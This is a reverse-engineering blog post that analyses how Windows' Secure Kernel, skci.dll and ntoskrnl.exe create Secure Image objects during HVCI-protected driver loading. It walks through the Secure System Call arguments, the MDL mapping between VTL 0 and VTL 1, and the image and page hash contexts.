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Today β€” 3 June 2024Vulnerabily Research

Windows Internals: Dissecting Secure Image Objects - Part 1

1 June 2024 at 00:00


Recently I have been working on an un-published (at this time) blog post that will look at how securekernel.exe and ntoskrnl.exe work together in order to enable and support the Kernel Control Flow Guard (Kernel CFG) feature, which is enabled under certain circumstances on modern Windows systems. This comes from the fact that I have recently been receiving questions from others on this topic. During the course of my research, I realized that a relatively-unknown topic that kept reappearing in my analysis was the concept of Normal Address Ranges (NARs) and Normal Address Table Entries (NTEs), sometimes referred to as NT Address Ranges or NT Address Table Entries. The only mention I have seen of these terms comes from Windows Internals 7th Edition, Part 2, Chapter 9, which was written by Andrea Allievi. The more I dug in, the more I realized this topic could probably use its own blog post.

However, when I started working on that blog post I realized that the concept of β€œSecure Image Objects” also plays into NAR and NTE creation. Because of this, I realized I maybe could just start with Secure Image objects!

Given the lack of debugging capabilities for securekernel.exe, lack of user-defined types (UDTs) in the securekernel.exe symbols, and overall lack of public information, there is no way (as we will see) I will be able to completely map Secure Image objects back to absolute structure definitions (and the same goes with NAR/NTEs). This blog (and subsequent ones) are really just analysis posts outlining things such as Secure System Calls, functionality, the reverse engineering methodology I take, etc. I am not an expert on this subject matter (like Andrea, Satoshi Tanda, or others) and mainly writing up my analysis for the sheer fact there isn’t too much information out there on these subjects and I also greatly enjoy writing long-form blog posts. With that said, the β€œsong-and-dance” performed between NT and Secure Kernel to load images/share resources/etc. is a very complex (in my mind) topic. The terms I use are based on the names of the functions, and may differ from the actual terms as an example. So please feel free to reach out with improvements/corrections. Lastly, Secure Image objects can be created for other images other than drivers. We will be focusing on driver loads. With this said, I hope you enjoy!


Windows Internals, 7th Edition, Chapter 9 gives a brief mention of SECURE_IMAGE objects:

…The NAR contains some information of the range (such as its base address and size) and a pointer to a SECURE_IMAGE data structure, which is used for describing runtime drivers (in general, images verified using Secure HVCI, including user mode images used for trustlets) loaded in VTL 0. Boot-loaded drivers do not use the SECURE_IMAGE data structure because they are treated by the NT memory manager as private pages that contain executable code…

As we know with HVCI (at the risk of being interpreted as pretentious, which is not my intent, I have linked my own blog post), VTL 1 is responsible for enforcing W^X (write XOR execute, meaning WX memory is not allowed). Given that drivers can be dynamically loaded at anytime on Windows, VTL 0 and VTL 1 need to work together in order to ensure that before such drivers are actually loaded, the Secure Kernel has the opportunity to apply the correct safeguards to ensure the new driver isn’t used, for instance, to load unsigned code. This whole process starts with the creation of the Secure Image object.

This is required because the Secure Kernel needs to monitor access to some of the memory present in VTL 0, where β€œnormal” drivers live. Secure Image objects allow the Secure Kernel to manage the state of these runtime drivers. Managing the state of these drivers is crucial to enforcing many of the mitigations provided by virtualization capabilities, such as HVCI. A very basic example of this is when a driver is being loaded in VTL 0, we know that VTL 1 needs to create the proper Second Layer Address Translation (SLAT) protections for each of the given sections that make up the driver (e.g., the .text section should be RX, .data RW, etc.). In order for VTL 1 to do that, it would likely need some additional information and context, such as maybe the address of the entry point of the image, the number of PE sections, etc. - this is the sort of thing a Secure Image object can provide - which is much of the needed context that the Secure Kernel needs to β€œdo its thing”.

This whole process starts with code in NT which, upon loading runtime drivers, results in NT extracting the headers from the image being loaded and sending this information to the Secure Kernel in order to perform the initial header verification and build out the Secure Image object.

I want to make clear again - although the process for creating a Secure Image object may start with what we are about to see in this blog post, even after the Secure System Call returns to VTL 0 in order to create the initial object, there is still a β€œsong-and-dance” performed by ntoskrnl.exe, securekernel.exe, and skci.dll. This specific blog does not go over this whole β€œsong-and-dance”. This blog will focus on the initial steps taken to get the object created in the Secure Kernel. In future blogs we will look at what happens after the initial object is created. For now, we will just stick with the initial object creation.

A Tiny Secure System Call Primer

Secure Image object creation begins through a mechanism known as a Secure System Call. Secure System Calls work at a high-level similarly to how a traditional system call works:

  1. An untrusted component (NT in this case) needs to access a resource in a privileged component (Secure Kernel in this case)
  2. The privileged component exposes an interface to the untrusted component
  3. The untrusted component packs up information it wants to send to the privileged component
  4. The untrusted component specifies a given β€œcall number” to indicate what kind of resource it needs access to
  5. The privileged component takes all of the information, verifies it, and acts on it

A β€œtraditional” system call will result in the emission of a syscall assembly instruction, which performs work in order to change the current execution context from user-mode to kernel-mode. Once in kernel-mode, the original request reaches a specified dispatch function which is responsible for servicing the request outlined by the System Call Number. Similarly, a Secure System Call works almost the same in concept (but not necessarily in the technical implementation). Instead of syscall, however, a vmcall instruction is emitted. vmcall is not specific to the Secure Kernel and is a general opcode in the 64-bit instruction set. A vmcall instruction simply allows guest software (in our case, as we know from HVCI, VTL 0 - which is where NT lives - is effectively treated as β€œthe guest”) to make a call into the underlying VM monitor/supervisor (Hyper-V). In other words, this results in a call into Secure Kernel from NT.

The NT function nt!VslpEnterIumSecureMode is a wrapper for emitting a vmcall. The thought process can be summed up, therefore, as this: if a given function invokes the nt!VslpEnterIumSecureMode function in NT, that caller of said function is responsible (generally speaking mind you) of invoking a Secure System Call.

Although performing dynamic analysis on the Secure Kernel is difficult, one thing to note here is that the order the Secure Systm Call arguments are packed and shipped to the Secure Kernel is the same order the Secure Kernel will operate on them. So, as an example, the function nt!VslCreateSecureImageSection is one of the many functions in NT that results in a call to nt!VslpEnterIumSecureMode.

The Secure System Call Number, or SSCN, is stored in the RDX register. The R9 register, although not obvious from the screenshot above, is responsible for storing the packed Secure System Call arguments. These arguments are packed in the form of a in-memory typedef struct structure (which we will look at later).

On the Secure Kernel side, the function securekernel!IumInvokeSecureService is a very large function which is the β€œentry point” for Secure System Calls. This contains a large switch/case statement that correlates a given SSCN to a specific dispatch function handler. The exact same order these arguments are packed is the exact same order they will be unpacked and operated on by the Secure Kernel (in the screenshot below, a1 is the address of the structure, and we can see how various offsets are being extracted from the structure, which is due to struct->Member access).

Now that we have a bit of an understanding here, let’s move on to see how the Secure System Call mechanism is used to help Secure Kernel create a Secure Image object!

SECURE_IMAGE (Non-Comprehensive!) Creation Overview

Although by no means is this a surefire way to identify this data, a method that could be employed to locate the functionality for creating Secure Image objects is to just search for terms like SecureImage in the Secure Kernel symbols. Within the call to securekernel!SkmmCreateSecureImageSection we see a call to an externally-imported function, skci!SkciCreateSecureImage.

This means it is highly likely that securekernel!SkmmCreateSecureImageSection is responsible for accepting some parameters surrounding the Secure Image object creation and forwarding that on to skci!SkciCreateSecureImage. Focusing our attention on securekernel!SkmmCreateSecureImageSection we can see that this functionality (securekernel!SkmmCreateSecureImageSection) is triggered through a Secure System Call with an SSCN of 0x19 (the screenshot below is from the securekernel!IumInvokeSecureService Secure System Call dispatch function).

Again, by no means is this correct in all cases, but I have noticed that most of the time when a Secure System Call is issued from ntoskrnl.exe, the corresponding β€œlowest-level function”, which is responsible for invoking nt!VslpEnterIumSecureMode, has a similar name to the associated sispatch function in securekernel.exe which handles the Secure System Call. Luckily this applies here and the function which issues the SSCN of 0x19 is the nt!VslCreateSecureImageSection function.

Based on the call stack here, we can see that when a new section object is created for a target driver image being loaded, the ci.dll module is dispatched in order to determine if the image is compatible with HVCI (if it isn’t, STATUS_INVALID_IMAGE_HASH is returned). Examining the parameters of the Secure System Call reveals the following.

Note that at several points I will have restarted the machine the analysis was performed on and due to KASLR the addresses will change. I will provide enough context in the post to overcome this obstacle.

With Secure System Calls, the first parameter (seems to be) always 0 and/or reserved. This means the arguments to create a Secure Image object are packed as follows.

    PVOID Reserved;
    PVOID VirtualAddress;
    PVOID PageFrameNumber;
    bool Unknown;
    ULONG Unknown;
    ULONG Unknown1;

As a small point of contention, I know that the page frame number is such because I am used to dealing with looking into memory operations that involve both physical and virtual addresses. Anytime I see I am dealing with some sort of lower-level concept, like loading a driver into memory and I see a value that looks like a ULONG paired with a virtual address, I always assume this could be a PFN. I always assume this further in cases especially when the ULONG value is not aligned. A physical memory address is simply (page frame number * 0x1000), plus any potential offset. Since there is not 0 or 00 at the end of the address, this tells me that this is the page frame number. This is not a β€œsure” method to do this, but I will show how I validated this below.

At first, I was pretty stuck on what this first virtual address was used for. We previously saw the call stack which is responsible for invoking nt!VslCreateSecureImageSection. If you trace execution in IDA, however, you will quickly see this call stack is a bit convoluted as most of the functions called are called via function pointer as an input parameter from other functions making tracing the arguments a bit difficult. Fortunately, I saw that this virtual address was used in a call to securekernel!SkmmMapDataTransfer almost immediately within the Secure System Call handler function (securekernel!SkmmCreateSecureImageSection). Note although IDA is annotated a bit with additional information, we will get to that shortly.

It seems this function is actually publicly-documented thanks to Saar Amar and Daniel King’s BlackHat talk! This actually reveals to us that the first argument is an MDL (Memory Descriptor List) while the second parameter, which is PageFrameNumber, is a page frame number which we don’t know its use yet.

According to the talk, securekernel.exe tends to use MDLs, which are provided by VTL 0, for cases where data may need to be accessed by VTL 1. By no means is this an MDL internals post, but I will give a brief overview quickly. An MDL (nt!_MDL) is effectively a fixed-sized header which is prepended to a variable-length array of page frame numbers (PFNs). Virtual memory, as we know, is contiguous. The normal size of a page on Windows is 4096, or 0x1000 bytes. Using a contrived example (not taking into account any optimizations/etc.), let’s say a piece of malware allocated 0x2000 bytes of memory and stored shellcode in that same allocation. We could expect the layout of memory to look as follows.

We can see in this example the shellcode spans the virtual pages 0x1ad2000 and 0x1ad3000. However, this is the virtual location, which is contiguous. In the next example, the reality of the situation creeps in as the physical pages which back the shellcode are in two separate locations.

An MDL would be used in this case to describe the physical layout of the memory of a virtual memory region. The MDL is used to say β€œhey I have this contiguous buffer in virtual memory, but here are the physical non-contiguous page(s) which describe this contiguous range of virtual memory”.

MDLs are also typically used for direct memory access (DMA) operations. DMA operations don’t have the luxury of much verification, because they need to access data quickly (think UDP vs TCP). Because of this an MDL is used because it typically first locks the memory range described into memory so that the DMA operation doesn’t ever access invalid memory.

One of the main features of an MDL is that it allows multiple mappings for the given virtual address a given MDL described (the StartVa is the beginning of the virtual address range the MDL describes). For instance, consider an MDL with the following layout: a user-mode buffer is described by an MDL’s StartVa. As we know, user-mode addresses are only valid within the process context of which they reside (and the address space is per-process based on the current page table directory loaded into the CR3 register). Let’s say that a driver, which is in an arbitrary context needs to access the information in the user-mode buffer contained in Mdl->StartVa. If the driver goes to access this, and the process context is processA.exe but the address was only valid in processB.exe, you are accessing invalid memory and you would cause a crash.

An MDL allows you, through the MmGetSystemAddressForMdlSafe API, to actually request that the system map this memory into the system address space, from the non-paged pool. This allows us to access the contents of the user-mode buffer, through a kernel-mode address, in an arbitrary process context.

Now, using that knowledge, we can see that the exact same reason VTL 0 and VTL 1 use MDLs! We can think of VTL 0 as the β€œuser-mode” portion, and VTL 1 as the β€œkernel-mode” portion, where VTL 0 has an address with data that VTL 1 wants. VTL 1 can take that data (in the form of an MDL) and map it into VTL 1 so it can safely access the contents of memory described by the MDL.

Taking a look back at how the MDL looks, we can see that StartVa, which is the buffer the MDL describes, is some sort of base address. We can confirm this is actually the base address of an image being loaded because it contains nt!_IMAGE_DOS_HEADER header (0x5a4d is the magic (MZ) for a PE file and can be found in the beginning of the image, which is what a kernel image is).

However, although this looks to be the β€œbase image”, based on the alignment of Mdl->StartVa, we can see quickly that ByteCount tells us only the first 0x1000 bytes of this memory allocation are accessible via this MDL. The ByteCount of an MDL denotes the size of the range being described by the MDL. Usually the first 0x1000 bytes of an image are reserved for all of the headers (IMAGE_DOS_HEADER, IMAGE_FILE_HEADER, etc.). If we recall the original call stack (provided below for completeness) we can actually see that the NT function nt!SeValidateImageHeader is responsible for redirecting execution to ci.dll (which eventually results in the Secure System Call). This means in reality, although the StartVa is aligned to look like a base address, we are really just dealing with the headers of the target image at this point. Even though the StartVa is aligned like a base address, the fact of the matter is the actual address is not relevant to us - only the headers are.

As a point of contention before we move on, we can do basic retroactive analysis based on the call stack to clearly see that the image has only been mapped into memory. It has not been fully loaded - and only the initial section object that backs the image is present in virtual memory. As we do more analysis in this post, we will also verify this to be the case with actual data that shows many of the default values in the headers, from disk, haven’t been fixed up (which normally happens when the image is fully loaded).

Great! Now that we know this first paramter is an MDL that contains the image headers, the next thing that needs to happen is for securekernel.exe to figure out how to safely access the contents region described by the MDL (which are the headers).

The first thing that VTL 1 will do is take the MDL we just showed, provided by VTL 0, and creates a new MDL in VTL 1 that describes the provided MDL from VTL 0. In other words, the new MDL will be laid out as follows.

Vtl1CopyOfVtl0Mdl->StartVa = page_aligned_address_mdl_starts_in;
Vtl1CopyOfVtl0Mdl->ByteOffset = offset_from_page_aligned_address_to_actual_address;

MDLs usually work with a page-aligned address as the base, and any offset in ByteOffset. This is why the VTL 0 MDL is address is first page-aligned (Vtl0Mdl & 0xFFFFFFFFFFFFF000), and the offset to the MDL in the page is set in ByteOffset.

Additionally, from the previous image, we can now realize what the first page frame number used in our Secure System Call parameters is used for. This is the PFN which corresponds to the MDL (the parameter PfnOfVtl0Mdl). We can validate this in WinDbg.

We know that a physical page of memory is simply (page frame number * PAGE_SIZE + any offset). Although we can see in the previous screenshot that the contents of memory for the page-aligned address of the MDL and the physical memory correspond, if we add the page offset (0x250 in this case) we can clearly see that there is no doubt this is the PFN for the VTL 0 MDL. We can additionally see that for the PTE of the VTL0 MDL the PFNs align!

This MDL, after construction, has StartVa mapped into VTL 1. At this point, for all intents and purposes, vtl1MdlThatDescribesVtl0Mdl->MappedSystemVa contains the VTL 1 mapping of the VTL 0 MDL! All integrity checks are then performed on the MDL.

VTL 1 has now mapped the VTL 0 MDL (using another MDL). MappedSystemVa is now a pointer to the VTL 1 mapping of the VTL 0 MDL, and the integrity checks now occur on this new mapping, instead of directly operating on the VTL 0 MDL. After confirming the VTL 0 MDL contains legitimate data (the large if statement in the screenshot below), another MDL (not the MDL from VTL 0, not the MDL created by VTL 1 to describe the MDL from VTL 0, but a third, new MDL) is created. This MDL will be an actual copy of the now verified contents of the VTL 0 MDL. In otherwords, thirdNewMDl->StartVa = StartAddressOfHeaders (which is start of the image we are dealing with in the first place to create a securekernel!_SECURE_IMAGE structure).

We can now clearly see that since VTL 1 has created this new MDL, the page frame number (PFN) of the VTL 0 MDL was provided since a mapping of virtual memory is simply just creating another virtual page which is backed by a common physical page. When the new MDL is mapped, the Secure Kernel can then use NewMdl->MappedSystemVa to safely access, in the Secure Kernel virtual address space, the header information provided by the MDL from VTL 0.

The VTL 1 MDL, which is mapped into VTL 1 and has now had all contents verified. We now return back to the original caller where we started in the first place - securekernel!SkmmCreateSecureImageSection. This then allows VTL 1 to have a memory buffer where the contents of the image from VTL 0 resides. We can clearly see below this is immediately used in a call to RtlImageNtHeaderEx in order to validate that the memory which VTL 0 sent in the first place contains a legitimate image in order to create a securekernel!_SECURE_IMAGE object. It is also at this point that we determine if we are dealing with the 32-bit or 64-bit architecture.

More information is then gathered, such as the size of the optional headers, the section alignment, etc. Once this information is flushed out, a call to an external function SkciCreateSecureImage is made. Based on the naming convention, we can infer this function resides in skci.dll.

We know in the original Secure System Call that the second parameter is the PFN which backs the VTL 0 MDL. UnknownUlong and UnknownUlong1 here are the 4th and 5th parameters, respectively, passed to securekernel!SkmmCreateSecureImageSection. As of right now we also don’t know what they are. The last value I noticed was consistently this 0x800c constant across multiple calls to securekernel!SkmmCreateSecureImageSection.

Opening skci.dll in IDA, we can examine this function further, which seemingly is responsible for creating the secure image.

Taking a look into this function a bit more, we can see this function doesn’t create the object itself but it creates a β€œSecure Image Context”, which on this build of Windows is 0x110 bytes in size. The first function called in skci!SkciCreateSecureImage is skci!HashKGetHashLength. This is a very simple function, and it accepts two parameters - one an input and one an output or return. The input parameter is our last Secure System Call parameter, which was 0x800C.

Although IDA’s decompilation here is a bit confusing, what this function does is look for a few constant values - one of the options is 0x800C. If the value 0x800C is provided, the output parameter (which is the hash size based on function name and the fact the actual return value is of type NTSTATUS) is set to 0x20. This effectively insinuates that since obviously 0x800C is not a 0x20 byte value, nor a hash, that 0x800C must instead refer to a type of hash which is likely associated with an image. We can then essentially say that the last Secure System Call parameter for secure image creation is the β€œtype” of hash associated with this image. In fact, looking at cross references to this function reveals that the function skci!CiInitializeCatalogs passes the parameter skci!g_CiMinimumHashAlgorithm as the first parameter to this function - meaning that the first parameter actually specifies the hash algorithm.

After calculating the hash size, the Secure Image Context is then built out. This starts by obtaining the Image Headers (nt!_IMAGE_NT_HEADERS64) headers for the image. Then the Secure Image Context is allocated from the pool and initialized to 0 (this is how we know the Secure Image Context is 0x110 bytes in size). The various sections contained in the image are used to build out much of the information tracked by the Secure Image Context.

Note that UnknownULong1 was updated to ImageSize. I wish I had a better way to explain as to how I identified this, but in reality it happenstance as I was examining the optional headers I realized I had seen this value before. See the image below to validate that the value from the Secure System Call arguments corresponds to SizeOfImage.

One thing to keep in mind here is a SECURE_IMAGE object is created before ntoskrnl.exe has had a chance actually perform the full loading of the image. At this point the image is mapped into virtual memory, but not loaded. We can see this by examining the nt!_IMAGE_NT_HEADERS64 structure and seeing that ImageBase in the nt!_IMAGE_OPTIONAL_HEADER64 structure is still set to a generic 0x1c0000000 address instead of the virtual address which the image is currently mapped (because this information has not yet been updated as part of the loading process).

Next in the Secure Image Context creation functionality, the Secure Kernel locates the .rsrc section of the image and the Resource Data Directory. This information is used to calculate the file offset to the Resource Data Directory and also captures the virtual size of the .rsrc section.

After this skci!SkciCreateSecureImage will, if the parameter we previously identified as UnknownBool is set to true, allocate some pool memory which will be used in a call to skci!CiCreateVerificationContextForImageGeneratedPageHashes. This infers to us the β€œunknown bool” is really an indicator whether or not to create the Verification Context. A context, in this instance, refers to some memory (usually in the form of a structure) which contains information related to the context in which something was created, but wouldn’t be available later otherwise.

The reader should know - I asked Andrea a question about this. The answer here is that a file can either be page-hashed or file-hashed signed. Although the bool gates creating the Verification Context, it is more aptly used to describe if a file is file-hashed or page-hashed. If the image is file-hashed signed, the Verification Context is created. For page-hashed files there is no need for the additional context information (we will see why shortly).

This begs the question - how do we know if we are dealing with a file that was page-hashed signed or file-hash signed? Taking a short detour, this starts in the initial section object creation (nt!MiCreateNewSection). During this time a bitmask, based on the parameters surrounding the creation of the section object that will back the loaded driver is formed. A partially-reversed CREATE_SECTION_PACKET structure from my friend Johnny Shaw outlines this. Packet->Flags is one of the main factors that dictates how this new bitmask is formulated. In the case of the analysis being done in this blog post, when bit 21 (PacketFlags & 0x100000) and when bit 6 (PacketFlags & 0x20) are set, we get the value for our new mask - which has a value of 0x40000001. This bitmask is then carried through to the header validation functions, as seen below.

This bitmask will finally make its way to ci!CiGetActionsForImage. This call, as the name infers, returns another bitmask based on our 0x40000001 bitmask. The caller of ci!CiGetActionsForImage is ci!CiValidateImageHeader. This new returned bitmask gives instructions to the header validation function as to what actions to take for validation.

As previous art shows, depending on the bitmask returned the header validation is going to be done via page hash validation, or file hash validation by supplying a function pointer to the actual validation function.

The two terms (page-hash signed and file-hash signed) can be very confusing - and there is very little information about them in the wild. A file-hashed file is one that has the entire contents of the file itself hashed. However, we must consider things like a driver being paged out and paged in. When an image is paged in, for instance, it needs to be validated. Images in this case are always verified using page hashes, and never file hashes (I want to make clear I only know the following information because I asked Andrea). Because a file-hashed file would not have page hash information available (obviously since it is β€œfile-hashed”), skci.dll will create something called a β€œPage Hash Context” (which we will see shortly) for file-hashed images so that they are compatible with the requirement to verify information using page hashes.

As a point of contention, this means we have determined the arguments used for a Secure Image Secure System Call.

    PVOID Reserved;
    PVOID Vtl0MdlImageHeaders;
    PVOID PageFrameNumberForMdl;
    bool ImageeIsFileHashedCreateVerificationContext;
    ULONG ImageSize;
    ULONG HashAlgorithm;

Moving on, the first thing this function (since we are dealing with a file-hashed image) does is actually call two functions which are responsible for creating additional contexts - the first is an β€œImage Hash Context” and the second is a β€œPage Hash Context”. These contexts are stored in the main Verification Context.

skci!CiCreateImageHashContext is a relatively small wrapper that simply takes the hashing algorithm passed in as part of the Secure Image Secure System Call (0x800C in our case) and uses this in a call to skci!SymCryptSha256Init. skci!SymCryptSha256Init takes the hash algorithm (0x800C) and uses it to create the Image Hash Context for our image (which really isn’t so much a β€œcontext” as it mainly just contains the size of the hash and the hashing data itself).

The Page Hash Context information is only produced for a file-hashed image. Otherwise file-hashed images would not have a way to be verified in the future as only page hashes are used for verification of the image. Page Hash Context are slightly more involved, but provide much of the same information. skci!CiCreatePageHashContextForImageMapping is responsible for creating this context and VerificationContext_Offset_0x108 stores the actual Page Hash Context.

The Page Hash Context logic begins by using SizeOfRawData from each of the section headers (IMAGE_SECTION_HEADER) to iterate over of the sections available in the image being processed and to capture how many pages make up each section (determines how many pages make up all of the sections of the image).

This information, along with IMAGE_OPTIONAL_HEADER->SizeOfHeaders, the size of the image itself, and the number of pages that span the sections of the image are stored in the Page Hash Context. Additionally, the Page Hash Context is then allocated based on the size of the sections (to ensure enough room is present to store all of the needed information).

After this, the Page Hash Context information is filled out. This begins by only storing the first page of the image in the Page Hash Context. The rest of the pages in each of the sections of the target image are filled out via skci!SkciValidateImageData, which is triggered by a separate Secure System Call. This comes at a later stage after the current Secure System Call has returned but before we have left the original nt!MiCreateNewSection function. We will see this in a future blog post.

Now that the initial Verification Context (which contains also the Page Hash and Image Hash Contexts) have been created (but as we know will be updated with more information later), skci!SkciCreateSecureImage will then sort and copy information from the Image Section Headers and store them in the Verification Context. This function will also calculate the file offset for the last section in the image by computing PointerToRawData + SizeOfRawData in the skci!CiGetFileOffsetAfterLastRawSectionData function.

After this, the Secure Image Context creation work is almost done. The last thing this function does is compute the hash of the first page of the image and stores it in the Secure Image Context directly this time. This also means the Secure Image Context is returned by the caller of skci!SkciCreateSecureImage, which is the Secure Kernel function servicing the original Secure System Call.

Note that previously we saw skci!CiAddPagesToPageHashContext called within skci!CiCreatePageHashContextForImageMapping. In the call in the above image, the fourth parameter is SizeOfHeaders, but in the call within skci!CiCreatePageHashContextForImageMapping the parameter was MdlByteCount - which is the ByteCount provided earlier by the MDL in the Secure System Call arguments. In our case, SizeOfHeaders and the ByteCount are both 0x1000 - which infers that when the MDL is constructured, the ByteCount is set to 0x1000 based on the SizeOfHeaders from the Optional Header. This validates what we mentioned at the beginning of the blog where although the β€œbase address” is used as the first Secure System Call parameter, this could be more specifically referred to as the β€œheaders” for the image.

The Secure Kernel maintains a table of all active Secure Images that are known. There are two very similar tables, which are used to track threads and NARs (securekernel!SkiThreadTable/securekernel!SkiNarTable). These are of type β€œsparse tables”. A sparse table is a computer science concept that effectively works like a static array of data, but instead of it being unordered the data is ordered which allows for faster lookups. It works by supporting 0x10000000, or 256,000 entries. Note that these entries are not all allocated at once, but are simply β€œreserved” in the sense that the entries that are not in use are not mapped.

Secure Images are tracked via the securekernel!SkmiImageTable symbol. This table, as a side note, is initialized when the Secure Kernel initializes. The Secure Pool, the Secure Image infrastructure, and the Code Integrity infrastructure are initialized after the kernel-mode user-shared data page is mapped into the Secure Kernel.

The Secure Kernel first allocates an entry in the table where this Secure Image object will be stored. To calculate the index where the object will be stored, securekernel!SkmmAllocateSparseTableEntry is called. This creates a sizeof(ULONG_PTR) β€œindex” structure. This determines the index into the table where the object is stored. In the case of storing a new entry, on 64-bit, the first 4 bytes provide the index and the last 4 bytes are unused (or, if they are used, I couldn’t see where). This is all done back in the original function securekernel!SkmmCreateSecureImageSection, after the function which creates the Secure Image Context has returned.

As we can also see above, this is where our actual Secure Image object is created. As the functionality of securekernel!SkmmCreateSecureImageSection continues, this object will get filled out with more and more information. Some of the first data collected is if the image is already loaded in a valid kernel address. From the blog earlier, we mentioned the Secure Image loading occurs when an image is first mapped but not loaded. This seems to infer it is possible for a Secure Image to be at least already loaded at a valid kernel-mode address. If it is loaded, a bitwise OR happens with a mask of 0x1000 to indicate this. The entry point of the image is captured, and the previously-allocated Secure Image Context data is saved. Also among the first information collected is the Virtual Address and Size of the Load Config Data Directory.

The next items start by determining if the image being loaded is characterized as a DLL (this is technically possible, for example, ci.dll is loaded into kernel-mode) by checking if the 13th bit is set in the FileHeader.Characteristics bitmask.

After this, the Secure Image creation logic will create an allocation based on the size of the image from NtHeaders->OptionalHeader->SizeOfImage. This allocation is not touched again during the initialization logic.

At this point, for each of the sections in the image, the prototype PTEs for the image (via securekernel!SkmiPopulateImagePrototypes) are populated. If you are not familiar, when a shared memory region is shared for, as an example, between two-processes an issue arises at the PTE level. A prototype PTE allows easily for the memory manager to track pages that are shared between two processes. As even Windows Internals, 7th Edition, Part 1, Chapter 5 states - prototype PTEs are created for a pagefile-backed section object when it is first created. The same this effectively is happening here, but instead of actually creating the prototype PTEs (because this is done in VTL 0), the Secure Kernel now obtains a pointer to the prototype PTEs.

After this, additional section data and relocation information for the image is captured. This first starts by checking if the relocation information is stripped and, if the information hasn’t been stripped, the code captures the Image Data Directory associated with relocation information.

The next thing that occurs is, again, each of the present sections is iterated over. This is done to capture some important information about each section in a memory allocation that is stored in the Secure Image object. Specifically here, relocation information is being processed. The Secure Image object creation logic will first allocate some memory in order to store the Virtual Address page number, size of the raw data in number of pages, and pointer to raw data for the section header that is currently being processed. As a part of each check, the logic determines if the relocation table falls within the range of the current section. If it does, the file offset to the relocation table is calculated and stored in the Secure Image object.

Additionally, we saw previously that if the relocation information was stripped out of the image, the Secure Image object (at offset 0x50 and 0x58) were updated with values of false and true, 0 and 1, respectively. This seems to indicate why the relocation information may not be present. In this case, however, if the relocation information wasn’t stripped but there legitimately was no relocation information available (the Image Data Directory entry for the relocation data was zero), these boolean values are updated to true and false, 1 and 0, respectively. This would seem to indicate to the Secure Image object why the relocation information may or may not be present.

The last bits of information the Secure Image object creation logic processes are:

  1. Is the image being processed a 64-bit executable image or are the number of data directories at least 10 decimal in amount to support the data directory we want to capture? If not, skip step 2.
  2. If the above is true, allocate and fill out the β€œDynamic Relocation Data”

As a side-note, I only determines the proper name for this data is β€œDynamic Relocation Data” because of the routine securekernel!SkmiDeleteImage - which is responsible for deleting a Secure Image object when the object’s reference count reaches 0 (after we get through this last bit of information that is processed, we will talk about this routine in more detail). In the securekernel!SkmiDeleteImage logic, a few pointers in the object itself are checked to see if they are allocated. If they are, they are freed (this makes sense, as we have seen there have been many more memory allocations than just the object itself). SecureImageObject + 0xB8 is checked as a place in the Secure Image object that is allocated. If the allocation is present, a function called securekernel!SkmiFreeDynamicRelocationInfo is called to presumably free this memory.

This would indicate that the β€œDynamic Relocation Data” is being created in the Secure Image object creation logic.

The information captured here refers to the load configuration Image Data Directory. The information about the load config data is verified, and the virtual address and size are captured and stored in the Secure Image object. This makes sense, as the dynamic relocation table is just the load config directory of an executable.

This is the last information the Secure Image object needs for the initialization (we know more information will be collected after this Secure System Call returns)! Up until this point, the last parameter we haven’t touched in the securekernel!SkmmCreateSecureImageSection function is the last parameter, which is actually an output parameter. The output parameter here is filled with the results of a call to securekernel!SkobCreateHandle.

If we look back at the initial Secure System Call dispatch function, this output parameter will be stored in the original Secure System Call arguments at offset 0x10 (16 decimal)

This handle is also stored in the Secure Image object itself. This also infers that when a Secure Image object is created, a handle to the object is returned to VTL 0/NT! This handle is eventually stored in the control area for the section object which backs the image (in VTL 0) itself. This is stored in ControlArea->u2.e2.SeImageStub.StrongImageReference.

Note that this isn’t immediately stored in the Control Area of the section object. This happens later, as we will see in a subsequent blog post, but it is something at least to note here. As another point of contention, the way I knew this handle would eventually be stored here is because when I was previously doing analysis on NAR/NTE creation, which we will eventually talk about, this handle value was the first parameter passed as part of the Secure System Call.

This pretty much sums up the instantiation of the initial Secure Image object. The object is now created but not finalized - much more data still needs to be validated. Because this further validation happens after the Secure System Call returns, I will put that analysis into another blog post. The future post we will look at what ntoskrnl.exe, securekernel.exe, and skci.dll do with this object after the initial creation before the image is actually loaded fully into VTL 0. Before we close the blog post, it is worth taking a look the object itself and how it is treated by the Secure Kernel.

Secure Image Objects - Now What?

After the Secure Image object is created, the β€œclean-up” code for the end of the function (securekernel!SkmmCreateSecureSection) dereferences the object if the object was created but failure occured during the setting up of the initial object. Notice that the object is dereferenced at 0x20 bytes before the actual object address.

What does this mean? Objects are prepended with a header that contains metadata about the object itself. The reference count for an object, historically, on Windows is contained in the object header (for the normal kernel this is nt!_OBJECT_HEADER). This tells us that each object managed by the Secure Kernel has a 0x20 byte header! Taking a look at securekernel!SkobpDereferenceObject we can clearly see that within this header the reference count itself is stored at offset 0x18. We can also see that there is an object destructor, contained in the header itself.

Just like regular NT objects, there is a similar β€œOBJECT_TYPE” setup (nt!PsProcessType, nt!PsThreadType, etc.). Taking a look at the image below, securekernel!SkmiImageType is used when referring to Secure Image Objects.

Existing art denotes that this object type pointer (securekernel!SkmiImageType) contains the destructor and size of the object. This can be corroborated by the interested reader by opening securekernel.exe as data in WinDbg (windbgx -z C:\Windows\system32\securekernel.exe) and looking at the object type directly. This reveals that for the securekernel!SkmiImageType symbol there is an object destructor and, as we saw earlier with the value 0xc8, the size of this type of object.

The following are a list of most of the valid objects in the Secure Kernel I located (although it is unclear without further analysis what many of them are used for):

  1. Secure Image Objects (securekernel!SkmiImageType)
  2. Secure HAL DMA Enabler Objects (securekernel!SkhalpDmaEnablerType)
  3. Secure HAL DMA Mapping Objects (securekernel!SkhalpDmaMappingType)
  4. Secure Enclave Objects (securekernel!SkmiEnclaveType)
  5. Secure Hal Extension Object (securekernel!SkhalExtensionType)
  6. Secure Allocation Object (securekernel!SkmiSecureAllocationType)
  7. Secure Thread Object (securekernel!SkeThreadType)
  8. Secure Shadow Synchronization Objects (events/semaphores) (securekernel!SkeShadowSyncObjectType)
  9. Secure Section Object (securekernel!SkmiSectionType)
  10. Secure Process Object (securekernel!SkpsProcessType)
  11. Secure Worker Factory Object (securekernel!SkeWorkerFactoryObjectType)
  12. Secure PnP Device Object (securekernel!SkPnpSecureDeviceObjectType)

Additional Resources

Legitimately, at the end of the analysis I did for this blog, I stumbled across these wonderful documents titled β€œSecurity Policy Document”. They are produced by Microsoft for FIPS (The Federal Information Processing Standard). They contains some additional insight into SKCI/CI. Additional documents on other Windows technologies can be found here.


